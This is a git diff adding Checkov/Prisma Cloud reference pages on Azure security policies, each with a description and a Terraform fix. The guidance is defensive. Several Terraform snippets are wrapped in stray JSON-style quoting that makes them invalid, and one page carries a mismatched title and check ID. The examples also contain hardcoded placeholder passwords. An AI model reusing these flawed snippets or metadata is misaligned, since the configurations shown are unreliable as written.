100644 index 000000000..a247f6dc7 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-client-certificates-are-enforced-for-api-management.adoc @@ -0,0 +1,54 @@ +== Azure Client Certificates are not enforced for API management + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3b025847-6774-45ed-9b4d-8d2f5e49f379 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py[CKV_AZURE_152] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +By enforcing client certificates for API management, you can ensure that only clients that have a valid certificate are able to access your APIs. 
+This can help prevent unauthorized access to your APIs, and can also help protect against potential security threats such as data breaches or denial-of-service attacks.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* client_cert_enabled
+
+
+[source,go]
+----
+resource "azurerm_app_service" "pass" {
+  name                = "example-app-service"
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+  app_service_plan_id = azurerm_app_service_plan.example.id
+  client_cert_enabled = true
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-cognitive-services-enables-customer-managed-keys-cmks-for-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-cognitive-services-enables-customer-managed-keys-cmks-for-encryption.adoc
new file mode 100644
index 000000000..8ad26bd63
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-cognitive-services-enables-customer-managed-keys-cmks-for-encryption.adoc
@@ -0,0 +1,85 @@
+== Azure Cognitive Services does not use Customer Managed Keys (CMKs) for encryption
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 2f8c5bf7-682c-4efd-afbd-9a5fd6b5f1d9
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml[CKV2_AZURE_22]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+This policy identifies Cognitive Services accounts that are encrypted with default Microsoft-managed keys rather than customer-managed keys.
+It is a best practice to use customer-managed keys to encrypt your Cognitive Services data, as this gives you full control over the encrypted data.
+
+
+//*Runtime - Buildtime*
+
+
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_cognitive_account_customer_managed_key
+* *Arguments:* cognitive_account_id, key_vault_key_id
+
+
+[source,go]
+----
+resource "azurerm_cognitive_account" "cognitive_account_good" {
+  name                          = "example-account"
+  location                      = azurerm_resource_group.example.location
+  resource_group_name           = azurerm_resource_group.example.name
+  kind                          = "Face"
+  sku_name                      = "E0"
+  public_network_access_enabled = false
+}
+
+
+resource "azurerm_key_vault" "good_vault" {
+  name                = "example-vault"
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+  tenant_id           = data.azurerm_client_config.current.tenant_id
+  sku_name            = "standard"
+}
+
+
+resource "azurerm_key_vault_key" "good_key" {
+  name         = "example-key"
+  key_vault_id = azurerm_key_vault.good_vault.id
+  key_type     = "RSA"
+  key_size     = 2048
+  key_opts     = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"]
+}
+
+
+resource "azurerm_cognitive_account_customer_managed_key" "good_cmk" {
+  cognitive_account_id = azurerm_cognitive_account.cognitive_account_good.id
+  key_vault_key_id     = azurerm_key_vault_key.good_key.id
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-data-exfiltration-protection-for-azure-synapse-workspace-is-enabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-data-exfiltration-protection-for-azure-synapse-workspace-is-enabled.adoc
new file mode 100644
index 000000000..3f7e01e7b
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-data-exfiltration-protection-for-azure-synapse-workspace-is-enabled.adoc
@@ -0,0 +1,70 @@
+== Azure Data exfiltration protection for Azure Synapse workspace is disabled
+// Azure Data exfiltration protection for Azure Synapse workspace disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f830d321-b08f-43b7-ba6f-0367b65b08e7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py[CKV_AZURE_157] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Data exfiltration is the unauthorized transfer of data from a network or system, and can be a potential security threat. + +Enabling data exfiltration protection for your Azure Synapse workspace can help prevent unauthorized access to your data. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_synapse_workspace +* *Arguments:* data_exfiltration_protection_enabled + + +[source,go] +---- +{ + "resource "azurerm_synapse_workspace" "pass" { + name = "example" + resource_group_name = azurerm_resource_group.example.name + location = azurerm_resource_group.example.location + storage_data_lake_gen2_filesystem_id = azurerm_storage_data_lake_gen2_filesystem.example.id + sql_administrator_login = "sqladminuser" + sql_administrator_login_password = "H@Sh1CoR3!" 
+ managed_virtual_network_enabled = false + data_exfiltration_protection_enabled = true + aad_admin { + login = "AzureAD Admin" + object_id = "00000000-0000-0000-0000-000000000000" + tenant_id = "00000000-0000-0000-0000-000000000000" + } + + + tags = { + Env = "production" + } + +}", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-machine-learning-compute-cluster-minimum-nodes-is-set-to-0.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-machine-learning-compute-cluster-minimum-nodes-is-set-to-0.adoc new file mode 100644 index 000000000..2705ae12b --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-machine-learning-compute-cluster-minimum-nodes-is-set-to-0.adoc @@ -0,0 +1,63 @@ +== Azure Machine Learning Compute Cluster Minimum Nodes is not set to 0 + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0199900b-03d9-4dc3-9d6b-272289f74a57 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py[CKV_AZURE_150] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Setting the minimum number of nodes for your Azure Machine Learning Compute Clusters to 0 can help reduce the cost of running the cluster when it is not in use. +When the minimum number of nodes is set to 0, the cluster is scaled down to 0 nodes when it is not in use, and no resources are consumed. +By setting the minimum number of nodes to 0, you can ensure that the cluster is not consuming resources when it is not in use, which can help reduce your costs. +This can be especially useful if you only need to use the cluster occasionally or on an as-needed basis. 
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_machine_learning_compute_cluster +* *Arguments:* scale_settings.min_node_count + + +[source,go] +---- +{ + "resource "azurerm_machine_learning_compute_cluster" "ckv_unittest_pass" { + name = "example" + location = "West Europe" + vm_priority = "LowPriority" + vm_size = "Standard_DS2_v2" + machine_learning_workspace_id = azurerm_machine_learning_workspace.example.id + subnet_resource_id = azurerm_subnet.example.id + + scale_settings { + min_node_count = 0 + max_node_count = 1 + scale_down_nodes_after_idle_duration = "PT30S" # 30 seconds + } + +}", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-postgresql-flexible-server-enables-geo-redundant-backups.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-postgresql-flexible-server-enables-geo-redundant-backups.adoc new file mode 100644 index 000000000..98358604c --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-postgresql-flexible-server-enables-geo-redundant-backups.adoc @@ -0,0 +1,74 @@ +== Azure PostgreSQL Flexible Server does not enable geo-redundant backups + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9777c0b0-c852-452b-bc68-9b8da93b222a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py[CKV_AZURE_136] + +|Severity +|LOW + +|Subtype +|Build +//,Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Azure PostgreSQL Flexible Server allows you to choose between locally redundant or geo-redundant backup storage in the General Purpose and Memory Optimized tiers. +When the backups are stored in geo-redundant backup storage, they are not only stored within the region in which your server is hosted, but are also replicated to a paired data center. 
+This provides better protection and ability to restore your server in a different region in the event of a disaster. +//// +=== Fix - Runtime +TBA +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_postgresql_flexible_server +* *Arguments:* geo_redundant_backup_enabled + + +[source,go] +---- +{ + "resource "azurerm_postgresql_flexible_server" "pass" { + name = "example-psqlflexibleserver" + resource_group_name = "azurerm_resource_group.example.name" + location = "azurerm_resource_group.example.location" + version = "12" + delegated_subnet_id = "azurerm_subnet.example.id" + private_dns_zone_id = "azurerm_private_dns_zone.example.id" + administrator_login = "psqladmin" + administrator_password = "H@Sh1CoR3!" + zone = "1" + + storage_mb = 32768 + geo_redundant_backup_enabled = true + + sku_name = "GP_Standard_D4s_v3" + depends_on = ["azurerm_private_dns_zone_virtual_network_link.example"] + +}", + +} +---- + diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-resources-that-support-tags-have-tags.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-resources-that-support-tags-have-tags.adoc new file mode 100644 index 000000000..4e46a418a --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-resources-that-support-tags-have-tags.adoc @@ -0,0 +1,319 @@ +== Azure resources that support tags do not have tags + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| cbdcfe66-249f-4e7b-8184-eb8b77b33b49 + +|Checkov Check ID +|CKV_AZURE_CUSTOM_1 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Many different types of Azure resources support tags. 
+Tags allow you to add metadata to a resource to help identify ownership, perform cost / billing analysis, and to enrich a resource with other valuable information, such as descriptions and environment names. +While there are many ways that tags can be used, we recommend you follow a tagging practice. +View Microsoft's recommended tagging best practices https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging[here]. + + +[source,text] +---- +{ + "azurerm_analysis_services_server +azurerm_api_management +azurerm_api_management_named_value +azurerm_api_management_property +azurerm_app_configuration +azurerm_app_service +azurerm_app_service_certificate +azurerm_app_service_certificate_order +azurerm_app_service_environment +azurerm_app_service_managed_certificate +azurerm_app_service_plan +azurerm_app_service_slot +azurerm_application_gateway +azurerm_application_insights +azurerm_application_insights_web_test +azurerm_application_security_group +azurerm_attestation_provider +azurerm_automation_account +azurerm_automation_dsc_configuration +azurerm_automation_runbook +azurerm_availability_set +azurerm_backup_policy_vm +azurerm_backup_protected_vm +azurerm_bastion_host +azurerm_batch_account +azurerm_bot_channels_registration +azurerm_bot_connection +azurerm_bot_web_app +azurerm_cdn_endpoint +azurerm_cdn_profile +azurerm_cognitive_account +azurerm_communication_service +azurerm_container_group +azurerm_container_registry +azurerm_container_registry_webhook +azurerm_cosmosdb_account +azurerm_custom_provider +azurerm_dashboard +azurerm_data_factory +azurerm_data_lake_analytics_account', +azurerm_data_lake_store +azurerm_data_share_account +azurerm_database_migration_project +azurerm_database_migration_service +azurerm_databox_edge_device +azurerm_databricks_workspace +azurerm_dedicated_hardware_security_module +azurerm_dedicated_host +azurerm_dedicated_host_group +azurerm_dev_test_global_vm_shutdown_schedule 
+azurerm_dev_test_lab +azurerm_dev_test_linux_virtual_machine +azurerm_dev_test_policy +azurerm_dev_test_schedule +azurerm_dev_test_virtual_network +azurerm_dev_test_windows_virtual_machine +azurerm_devspace_controller +azurerm_digital_twins_instance +azurerm_disk_access +azurerm_disk_encryption_set +azurerm_dns_a_record +azurerm_dns_aaaa_record +azurerm_dns_caa_record +azurerm_dns_cname_record +azurerm_dns_mx_record +azurerm_dns_ns_record +azurerm_dns_ptr_record +azurerm_dns_srv_record +azurerm_dns_txt_record +azurerm_dns_zone +azurerm_eventgrid_domain +azurerm_eventgrid_system_topic +azurerm_eventgrid_topic +azurerm_eventhub_cluster +azurerm_eventhub_namespace +azurerm_express_route_circuit +azurerm_express_route_gateway +azurerm_express_route_port +azurerm_firewall +azurerm_firewall_policy', +azurerm_frontdoor +azurerm_frontdoor_firewall_policy +azurerm_function_app +azurerm_function_app_slot +azurerm_hdinsight_hadoop_cluster +azurerm_hdinsight_hbase_cluster +azurerm_hdinsight_interactive_query_cluster +azurerm_hdinsight_kafka_cluster +azurerm_hdinsight_ml_services_cluster +azurerm_hdinsight_rserver_cluster +azurerm_hdinsight_spark_cluster +azurerm_hdinsight_storm_cluster +azurerm_healthcare_service +azurerm_hpc_cache +azurerm_image +azurerm_integration_service_environment +azurerm_iot_security_solution +azurerm_iot_time_series_insights_gen2_environment +azurerm_iot_time_series_insights_reference_data_set +azurerm_iot_time_series_insights_standard_environment +azurerm_iotcentral_application +azurerm_iothub +azurerm_iothub_dps +azurerm_ip_group +azurerm_key_vault +azurerm_key_vault_certificate +azurerm_key_vault_key +azurerm_key_vault_secret +azurerm_kubernetes_cluster +azurerm_kubernetes_cluster_node_pool +azurerm_kusto_cluster +azurerm_lb +azurerm_linux_virtual_machine +azurerm_linux_virtual_machine_scale_set +azurerm_local_network_gateway +azurerm_log_analytics_cluster +azurerm_log_analytics_linked_service +azurerm_log_analytics_saved_search 
+azurerm_log_analytics_solution +azurerm_log_analytics_storage_insights +azurerm_log_analytics_workspace +azurerm_logic_app_integration_account +azurerm_logic_app_workflow +azurerm_machine_learning_workspace +azurerm_maintenance_configuration +azurerm_managed_application +azurerm_managed_application_definition +azurerm_managed_disk +azurerm_management_group_template_deployment +azurerm_maps_account +azurerm_mariadb_server +azurerm_media_live_event +azurerm_media_services_account +azurerm_media_streaming_endpoint +azurerm_monitor_action_group +azurerm_monitor_action_rule_action_group +azurerm_monitor_action_rule_suppression +azurerm_monitor_activity_log_alert +azurerm_monitor_autoscale_setting +azurerm_monitor_metric_alert +azurerm_monitor_scheduled_query_rules_alert +azurerm_monitor_scheduled_query_rules_log +azurerm_monitor_smart_detector_alert_rule +azurerm_mssql_database +azurerm_mssql_elasticpool +azurerm_mssql_server +azurerm_mssql_virtual_machine +azurerm_mysql_server +azurerm_nat_gateway +azurerm_netapp_account +azurerm_netapp_pool +azurerm_netapp_snapshot +azurerm_netapp_volume +azurerm_network_connection_monitor +azurerm_network_ddos_protection_plan +azurerm_network_interface +azurerm_network_profile +azurerm_network_security_group +azurerm_network_watcher +azurerm_notification_hub +azurerm_notification_hub_namespace +azurerm_orchestrated_virtual_machine_scale_set +azurerm_point_to_site_vpn_gateway +azurerm_postgresql_server +azurerm_powerbi_embedded +azurerm_private_dns_a_record +azurerm_private_dns_aaaa_record +azurerm_private_dns_cname_record +azurerm_private_dns_mx_record +azurerm_private_dns_ptr_record +azurerm_private_dns_srv_record +azurerm_private_dns_txt_record +azurerm_private_dns_zone +azurerm_private_dns_zone_virtual_network_link +azurerm_private_endpoint +azurerm_private_link_service +azurerm_proximity_placement_group +azurerm_public_ip +azurerm_public_ip_prefix +azurerm_purview_account +azurerm_recovery_services_vault +azurerm_redis_cache 
+azurerm_redis_enterprise_cluster
+azurerm_relay_namespace
+azurerm_resource_group
+azurerm_resource_group_template_deployment
+azurerm_route_filter
+azurerm_route_table
+azurerm_search_service
+azurerm_security_center_automation
+azurerm_service_fabric_cluster
+azurerm_service_fabric_mesh_application
+azurerm_service_fabric_mesh_local_network
+azurerm_service_fabric_mesh_secret
+azurerm_service_fabric_mesh_secret_value
+azurerm_servicebus_namespace
+azurerm_shared_image
+azurerm_shared_image_gallery
+azurerm_shared_image_version
+azurerm_signalr_service
+azurerm_snapshot
+azurerm_spatial_anchors_account
+azurerm_spring_cloud_service
+azurerm_sql_database
+azurerm_sql_elasticpool
+azurerm_sql_failover_group
+azurerm_sql_server
+azurerm_ssh_public_key
+azurerm_stack_hci_cluster
+azurerm_storage_account
+azurerm_storage_sync
+azurerm_stream_analytics_job
+azurerm_subnet_service_endpoint_storage_policy
+azurerm_subscription
+azurerm_subscription_template_deployment
+azurerm_synapse_spark_pool
+azurerm_synapse_sql_pool
+azurerm_synapse_workspace
+azurerm_tenant_template_deployment
+azurerm_traffic_manager_profile
+azurerm_user_assigned_identity
+azurerm_virtual_desktop_application_group
+azurerm_virtual_desktop_host_pool
+azurerm_virtual_desktop_workspace
+azurerm_virtual_hub
+azurerm_virtual_hub_security_partner_provider
+azurerm_virtual_machine
+azurerm_virtual_machine_extension
+azurerm_virtual_machine_scale_set
+azurerm_virtual_network
+azurerm_virtual_network_gateway
+azurerm_virtual_network_gateway_connection
+azurerm_virtual_wan
+azurerm_vmware_private_cloud
+azurerm_vpn_gateway
+azurerm_vpn_server_configuration
+azurerm_vpn_site
+azurerm_web_application_firewall_policy
+azurerm_windows_virtual_machine
+azurerm_windows_virtual_machine_scale_set",
+
+}
+----
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+The example below shows how to tag a managed disk in Terraform.
+The syntax is generally the same for any taggable resource type.
+ + +[source,go] +---- +{ + "resource "azurerm_resource_group" "example" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_managed_disk" "example" { + name = "acctestmd" + location = "West US 2" + resource_group_name = azurerm_resource_group.example.name + storage_account_type = "Standard_LRS" + create_option = "Empty" + disk_size_gb = "1" + ++ tags = { ++ environment = "staging" + } + +} +", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-sql-server-has-default-auditing-policy-configured.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-sql-server-has-default-auditing-policy-configured.adoc new file mode 100644 index 000000000..f99a241cc --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-sql-server-has-default-auditing-policy-configured.adoc @@ -0,0 +1,74 @@ +== Azure SQL Server does not have default auditing policy configured + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8b72f2db-1338-4575-9a05-59bcced0e34b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py[CKV_AZURE_156] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Configuring a default auditing policy for your Azure SQL Server can help improve the security and management of your database. +Auditing allows you to keep a record of events and activities that have occurred on your database, such as user logins, data changes, and other actions. 
+
+
+//*Runtime - Buildtime*
+
+
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_mssql_server_extended_auditing_policy
+* *Arguments:* log_monitoring_enabled
+
+
+[source,go]
+----
+resource "azurerm_mssql_server_extended_auditing_policy" "pass" {
+  server_id              = azurerm_mssql_server.example.id
+  log_monitoring_enabled = true
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-virtual-machine-does-not-enable-password-authentication.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-virtual-machine-does-not-enable-password-authentication.adoc
new file mode 100644
index 000000000..fda10046d
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-azure-virtual-machine-does-not-enable-password-authentication.adoc
@@ -0,0 +1,59 @@
+== Azure Virtual machine enables password authentication
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 34dd5f50-7505-4002-a8ca-05f63e053479
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py[CKV_AZURE_149]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Disabling password authentication for your Azure virtual machine (VM) can help improve the security of your VM.
+Password authentication allows users to access the VM using a password, rather than an Azure Active Directory (Azure AD) account or other form of authentication.
+By disabling password authentication, you can help prevent unauthorized access to your VM and protect it from potential security threats such as data breaches.
+Instead, you should use more secure forms of authentication such as Azure AD, SSH keys, or multi-factor authentication.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_linux_virtual_machine_scale_set
+* *Arguments:* disable_password_authentication
+
+
+[source,go]
+----
+resource "azurerm_linux_virtual_machine_scale_set" "pass" {
+  name                            = var.scaleset_name
+  resource_group_name             = var.resource_group.name
+  location                        = var.resource_group.location
+  sku                             = var.sku
+  instances                       = var.instance_count
+  admin_username                  = var.admin_username
+  disable_password_authentication = true
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-cognitive-services-account-encryption-cmks-are-enabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-cognitive-services-account-encryption-cmks-are-enabled.adoc
new file mode 100644
index 000000000..bbfc810c6
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-cognitive-services-account-encryption-cmks-are-enabled.adoc
@@ -0,0 +1,87 @@
+== Storage Account name does not follow naming rules
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f06c6dbe-be9e-4966-b9ac-18fbe7f016c0
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountName.py[CKV_AZURE_43]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+By default, all data at rest in an Azure Cognitive
Services account is encrypted using Microsoft Managed Keys.
+It is recommended to use Customer Managed Keys to encrypt data in Azure Cognitive Services accounts for better control over data access.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_cognitive_account, azurerm_cognitive_account_customer_managed_key, azurerm_key_vault, azurerm_key_vault_key
+
+
+[source,go]
+----
+data "azurerm_client_config" "current" {}
+
+resource "azurerm_key_vault" "example" {
+  name                = "examplekv"
+  location            = "location"
+  resource_group_name = "group"
+  tenant_id           = data.azurerm_client_config.current.tenant_id
+  sku_name            = "standard"
+
+  purge_protection_enabled = true
+}
+
+
+resource "azurerm_key_vault_key" "example" {
+  name         = "tfex-key"
+  key_vault_id = azurerm_key_vault.example.id
+  key_type     = "RSA"
+  key_size     = 2048
+  key_opts     = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"]
+}
+
+
+resource "azurerm_cognitive_account" "cognitive_account_good" {
+  name                = "example-account"
+  resource_group_name = "group"
+  location            = "location"
+  kind                = "Face"
+  sku_name            = "E0"
+}
+
+
+resource "azurerm_cognitive_account_customer_managed_key" "good_cmk" {
+  cognitive_account_id = azurerm_cognitive_account.cognitive_account_good.id
+  key_vault_key_id     = azurerm_key_vault_key.example.id
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-ftp-deployments-are-disabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-ftp-deployments-are-disabled.adoc
new file mode 100644
index 000000000..b447ad16f
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-ftp-deployments-are-disabled.adoc
@@ -0,0 +1,58 @@
+== Azure App Services FTP deployment is All allowed
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 7fa164f0-fb0d-40a1-8293-8192f64eed81
+
+|Checkov
Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py[CKV_AZURE_78]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+FTPS (Secure FTP) adds an extra layer of security to the FTP protocol for Azure web applications using App Service, and helps you comply with industry standards and regulations.
+For enhanced security, it is highly advised to use FTP over TLS/SSL only.
+You can also disable both FTP and FTPS if you don't use FTP deployment.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_app_service
+* *Arguments:* ftps_state - (Optional) State of FTP / FTPS service for this App Service.
+
+Possible values include: AllAllowed, FtpsOnly and Disabled.
+
+
+[source,go]
+----
+resource "azurerm_app_service" "example" {
+  ...
++ ftps_state = "FtpsOnly"
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mssql-is-using-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mssql-is-using-the-latest-version-of-tls-encryption.adoc
new file mode 100644
index 000000000..84ec97986
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mssql-is-using-the-latest-version-of-tls-encryption.adoc
@@ -0,0 +1,55 @@
+== MSSQL is not using the latest version of TLS encryption
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b65c4ddf-6ece-4fd5-8ffc-3ce85343fc40
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MSSQLServerMinTLSVersion.py[CKV_AZURE_52]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+The Transport Layer Security (TLS) protocol
secures transmission of data between servers and web browsers over the internet using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of TLS protocol (i.e. +TLS 1.2) for all your MSSQL servers. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_mssql_server +* *Arguments:* minimum_tls_version + + +[source,go] +---- +{ + " resource "azurerm_mssql_server" "examplea" { + ... + + minimum_tls_version = "1.2" + ... + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mysql-is-using-the-latest-version-of-tls-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mysql-is-using-the-latest-version-of-tls-encryption.adoc new file mode 100644 index 000000000..c332b40c7 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-mysql-is-using-the-latest-version-of-tls-encryption.adoc @@ -0,0 +1,52 @@ +== MySQL is not using the latest version of TLS encryption + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a27abd50-b6c4-41bd-9395-72fa70b69185 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLServerMinTLSVersion.py[CKV_AZURE_54] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + +The Transport Layer Security (TLS) protocol secures transmission of data between servers and web browsers, over the Internet, using standard encryption technology. +To follow security best practices and the latest PCI compliance standards, enable the latest version of TLS protocol (i.e. +TLS 1.2) for all your MySQL servers. 
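+
+The key argument is `ssl_minimal_tls_version_enforced`, shown in context in the following fuller sketch of a compliant server (names and credentials are placeholders; assumes the `azurerm_mysql_server` schema from azurerm 2.x):
+
+[source,go]
+----
+resource "azurerm_mysql_server" "example" {
+  name                = "example-mysqlserver"
+  location            = azurerm_resource_group.example.location
+  resource_group_name = azurerm_resource_group.example.name
+
+  administrator_login          = "mysqladmin"
+  administrator_login_password = "H@Sh1CoR3!"
+
+  sku_name   = "GP_Gen5_2"
+  storage_mb = 5120
+  version    = "5.7"
+
+  # Require encrypted connections and the latest TLS version
+  ssl_enforcement_enabled          = true
+  ssl_minimal_tls_version_enforced = "TLS1_2"
+}
+----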
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* azurerm_mysql_server
+* *Arguments:* ssl_minimal_tls_version_enforced
+
+
+[source,go]
+----
+resource "azurerm_mysql_server" "examplea" {
+  ...
+
++ ssl_minimal_tls_version_enforced = "TLS1_2"
+}
+----
diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-standard-pricing-tier-is-selected.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-standard-pricing-tier-is-selected.adoc
new file mode 100644
index 000000000..51f7edb5e
--- /dev/null
+++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-standard-pricing-tier-is-selected.adoc
@@ -0,0 +1,118 @@
+== Azure Microsoft Defender for Cloud Defender plans is set to Off
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| c221ce81-99df-487e-8c05-4329335e9f9a
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py[CKV_AZURE_19]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|ARM, Terraform, Bicep, TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+The standard pricing tier enables threat detection for networks and virtual machines and allows greater defense-in-depth.
+It provides threat intelligence, anomaly detection, and behavior analytics in the Azure Security Center.
+Threat detection is provided by the Microsoft Security Response Center (MSRC).
+////
+=== Fix - Runtime
+
+
+*Azure Portal*
+
+To change the policy using the Azure Portal, follow these steps:
+
+
+. Log in to the Azure Portal at https://portal.azure.com.
+
+. Navigate to the *Azure Security Center*.
+
+. Select the *Security policy* blade.
+
